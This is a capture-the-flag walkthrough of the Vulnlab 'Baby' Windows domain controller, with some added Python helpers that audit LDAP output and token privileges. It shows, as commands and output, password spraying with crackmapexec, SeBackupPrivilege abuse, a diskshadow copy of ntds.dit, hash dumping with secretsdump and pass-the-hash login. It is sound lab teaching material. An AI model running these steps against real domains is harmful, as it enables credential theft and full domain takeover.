Vulnlab Windows Easy: Baby

Baby is an Easy rated Windows machine on Vulnlab.

Nmap Scan

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -Pn 10.10.126.15
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-26 14:24 CET
Nmap scan report for 10.10.126.15
Host is up (0.028s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-26 13:24:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2024-01-25T13:22:46
|_Not valid after:  2024-07-26T13:22:46
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-01-26T13:24:52+00:00
|_ssl-date: 2024-01-26T13:25:31+00:00; +3s from scanner time.
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-26T13:24:55
|_  start_date: N/A
|_clock-skew: mean: 2s, deviation: 0s, median: 2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.66 seconds

Add the domain and the DC hostname to the hosts file.

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts | grep 10.10.126.15
10.10.126.15 baby.vl BabyDC.baby.vl

Enumerate LDAP (Port 389)

An LDAP query with an anonymous bind (no credentials) finds a password in the description attribute of one user.

┌──(kali㉿kali)-[~]
└─$ ldapsearch -v -x -b "DC=baby,DC=vl" -H "ldap://10.10.126.15" "(objectclass=*)"
ldap_initialize( ldap://10.10.126.15:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes

# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
instanceType: 4
whenCreated: 20211121151108.0Z
whenChanged: 20211121151437.0Z
displayName: Teresa Bell
uSNCreated: 12889
memberOf: CN=it,CN=Users,DC=baby,DC=vl
uSNChanged: 12905
name: Teresa Bell
objectGUID:: EDGXW4JjgEq7+GuyHBu3QQ==
userAccountControl: 66080
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132819812778759642
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAf1veU67Ze+7mkhtWWgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Teresa.Bell
sAMAccountType: 805306368
userPrincipalName: Teresa.Bell@baby.vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dSCorePropagationData: 20211121163014.0Z
dSCorePropagationData: 20211121162927.0Z
dSCorePropagationData: 16010101000416.0Z
msDS-SupportedEncryptionTypes: 0

Extract all sAMAccountName values from LDAP.

┌──(kali㉿kali)-[~]
└─$ ldapsearch -v -x -b "DC=baby,DC=vl" -H "ldap://10.10.126.15" "(objectclass=*)" | grep 'sAMAccountName'
ldap_initialize( ldap://10.10.126.15:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
sAMAccountName: Guest
sAMAccountName: Domain Computers
sAMAccountName: Cert Publishers
sAMAccountName: Domain Users
sAMAccountName: Domain Guests
sAMAccountName: Group Policy Creator Owners
sAMAccountName: RAS and IAS Servers
sAMAccountName: Allowed RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
sAMAccountName: Enterprise Read-only Domain Controllers
sAMAccountName: Cloneable Domain Controllers
sAMAccountName: Protected Users
sAMAccountName: DnsAdmins
sAMAccountName: DnsUpdateProxy
sAMAccountName: dev
sAMAccountName: Jacqueline.Barnett
sAMAccountName: Ashley.Webb
sAMAccountName: Hugh.George
sAMAccountName: Leonard.Dyer
sAMAccountName: it
sAMAccountName: Connor.Wilkinson
sAMAccountName: Joseph.Hughes
sAMAccountName: Kerry.Wilson
sAMAccountName: Teresa.Bell
sAMAccountName: Caroline.Robinson
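The two ldapsearch steps above (spotting a password in a description attribute and collecting sAMAccountName values) can be done in one pass over the LDIF output instead of grep. The following Python parser is an added example and not part of the original post; it uses a constructed LDIF sample modelled on the entries above and flags descriptions that mention a password, which is also the check a defender would run against their own directory.

```python
"""Parse LDIF-style output (as produced by ldapsearch) into entries, list the
account names, and flag descriptions that look like they contain a password.
Added example, not part of the original post."""
import re

# Constructed sample: two entries modelled on the ldapsearch output above.
SAMPLE_LDIF = """\
# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: user
cn: Teresa Bell
description: Set initial password to BabyStart123!
objectGUID:: EDGXW4JjgEq7+GuyHBu3QQ==
sAMAccountName: Teresa.Bell
userAccountControl: 66080

# Hugh George, dev, baby.vl
dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
objectClass: user
cn: Hugh George
description: Developer account
sAMAccountName: Hugh.George
userAccountControl: 512
"""

# Words that, in a description attribute, usually mean a secret was stored there.
PASSWORD_HINTS = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)

# "attr: value" or "attr:: base64value"; anything else (comments, ldapsearch
# banner text) is skipped.
ATTR_LINE = re.compile(r"^([A-Za-z][\w-]*)(::?) ?(.*)$")


def parse_ldif(text):
    """Return a list of {attribute: [values]} dicts, one per LDIF entry.
    Base64 (::) values are kept as-is; a blank line ends an entry."""
    entries, current = [], {}
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue
        current.setdefault(m.group(1), []).append(m.group(3).strip())
    if current:
        entries.append(current)
    return entries


def account_names(entries):
    """All sAMAccountName values, in the order they appear."""
    return [v for e in entries for v in e.get("sAMAccountName", [])]


def descriptions_with_secrets(entries):
    """(sAMAccountName, description) pairs whose description mentions a password."""
    hits = []
    for e in entries:
        for desc in e.get("description", []):
            if PASSWORD_HINTS.search(desc):
                hits.append((e.get("sAMAccountName", ["?"])[0], desc))
    return hits


if __name__ == "__main__":
    parsed = parse_ldif(SAMPLE_LDIF)
    print("accounts:", account_names(parsed))
    for name, desc in descriptions_with_secrets(parsed):
        print(f"[!] {name}: {desc}")
```

Feed it real output with `parse_ldif(open("ldap.ldif").read())`; the same `descriptions_with_secrets` check run periodically against an exported directory catches the misconfiguration this box is built around before an anonymous bind does.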

Create a username file (users) from the account names above; the password to try is BabyStart123!.

Guest
dev
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
it
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson

Use crackmapexec to spray the password against all users.

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.126.15 -u users -p 'BabyStart123!'
SMB         10.10.126.15    445    BABYDC           [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\Guest:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\dev:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\it:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.10.126.15    445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

STATUS_PASSWORD_MUST_CHANGE means the credentials are correct but the account is flagged to change its password at next logon, so we have to set a new password for Caroline.Robinson before we can log in (Link). The new password used here is BabyStart123!!.

┌──(kali㉿kali)-[~]
└─$ smbpasswd -r 10.10.126.15 -U "caroline.robinson"
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user caroline.robinson

Log in with evil-winrm as caroline.robinson using the newly set password.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -u 'Caroline.Robinson' -p 'BabyStart123!!' -i 10.10.126.15

Evil-WinRM shell v3.5
  
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami
baby\caroline.robinson

User flag: VL{b2c6150b85125d32f4b253df9540d898}

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> type user.txt
VL{b2c6150b85125d32f4b253df9540d898}

Privilege Escalation

Using whoami /priv we can list our permissions.

*Evil-WinRM* PS C:\Users\Caroline.Robinson> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
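Reading a `whoami /priv` table by eye is error-prone, and the same table is what an auditor reviews when checking which privileges a non-administrator account has been granted. The Python below is an added example, not code from the original post: it parses the output shown above (embedded as a constructed sample) and returns the privileges that bypass file ACLs or otherwise lead to full control. The reason strings are this example's own summaries.

```python
"""Parse the output of `whoami /priv` and flag privileges that let a
non-administrator account read or write files regardless of their ACLs.
Added example for auditing a session, not code from the original post."""
import re

# Constructed sample, matching the table shown above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Privileges that are effectively equivalent to local administrator when held
# by an interactive user. Reason text is this example's own summary.
HIGH_RISK = {
    "SeBackupPrivilege": "read any file regardless of its ACL (registry hives, shadow-copied ntds.dit)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeImpersonatePrivilege": "impersonate tokens of other users",
    "SeAssignPrimaryTokenPrivilege": "assign primary tokens to new processes",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# One table row: name, free-text description, state.
ROW = re.compile(r"^(Se\w+)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: (description, state)} for each table row;
    header and separator lines do not match ROW and are skipped."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.rstrip())
        if m:
            privs[m.group(1)] = (m.group(2), m.group(3))
    return privs


def high_risk_privileges(privs, enabled_only=False):
    """Sorted list of (name, state, reason) for held privileges in HIGH_RISK.
    By default a Disabled privilege still counts: the token holds it and can
    enable it itself, which is what the Set-SeBackupPrivilege cmdlet used
    later in this post does."""
    hits = []
    for name, (_desc, state) in privs.items():
        if name in HIGH_RISK and (state == "Enabled" or not enabled_only):
            hits.append((name, state, HIGH_RISK[name]))
    return sorted(hits)


if __name__ == "__main__":
    table = parse_privileges(SAMPLE_WHOAMI_PRIV)
    for name, state, reason in high_risk_privileges(table):
        print(f"[!] {name} ({state}): {reason}")
```

On this box the result is SeBackupPrivilege and SeRestorePrivilege, which is the finding the rest of the post exploits; the fix on the defensive side is to keep these rights out of groups such as Backup Operators for ordinary domain users.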

SeBackupPrivilege lets us read (back up) any file on the system regardless of its ACL, which is why it is a privilege-escalation risk for a non-administrator account. Upload the following PoC DLLs.

*Evil-WinRM* PS C:\Users\Caroline.Robinson> upload Downloads/*.dll

Info: Uploading /home/kali/Downloads/*.dll to C:\Users\Caroline.Robinson

Info: Upload successful!

Now that the DLLs are transferred, we can follow this (Link).

*Evil-WinRM* PS C:\Users\Caroline.Robinson> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\Caroline.Robinson> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\Caroline.Robinson> Set-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\Caroline.Robinson> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt .\root.txt

Root flag: VL{9000cab96bcf62e99073ff5f6653ce90}

*Evil-WinRM* PS C:\Users\Caroline.Robinson> type root.txt
VL{9000cab96bcf62e99073ff5f6653ce90}

Shell as Administrator

Create a diskshadow script that takes a shadow copy of the C: volume and exposes it as E:.

┌──(kali㉿kali)-[~]
└─$ cat script.txt                   
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

Upload the script and execute it with diskshadow.

*Evil-WinRM* PS C:\Users\Caroline.Robinson> diskshadow /s script.txt

The shadow copy is now exposed as E:, and its copy of ntds.dit (the Active Directory database, which is locked on the live C: volume while the DC runs) can be copied to a folder on the C drive.

*Evil-WinRM* PS C:\temp> dir

    Directory: C:\temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/26/2024   3:03 PM       16777216 ntds.dit

To decrypt the hashes in ntds.dit, we also need the SYSTEM registry hive, which holds the boot key (Link).

*Evil-WinRM* PS C:\Users\Caroline.Robinson> reg.exe save HKLM\SYSTEM .\SYSTEM
The operation completed successfully.

*Evil-WinRM* PS C:\Users\Caroline.Robinson> download SYSTEM

Info: Downloading C:\Users\Caroline.Robinson\SYSTEM to SYSTEM
 
Info: Download successful!

Use secretsdump.py from Impacket to extract the hashes from ntds.dit offline (LOCAL mode).

┌──(kali㉿kali)-[/opt/impacket/examples]
└─$ ./secretsdump.py -ntds /home/kali/ntds.dit -system /home/kali/SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from /home/kali/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::

Log in with evil-winrm using the Administrator NTLM hash (pass-the-hash).

┌──(kali㉿kali)-[~]
└─$ evil-winrm -u "Administrator" -H "ee4457ae59f1e3fbd764e33d9cef123d" -i 10.10.126.15

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
baby\administrator

This post is licensed under CC BY 4.0 by the author.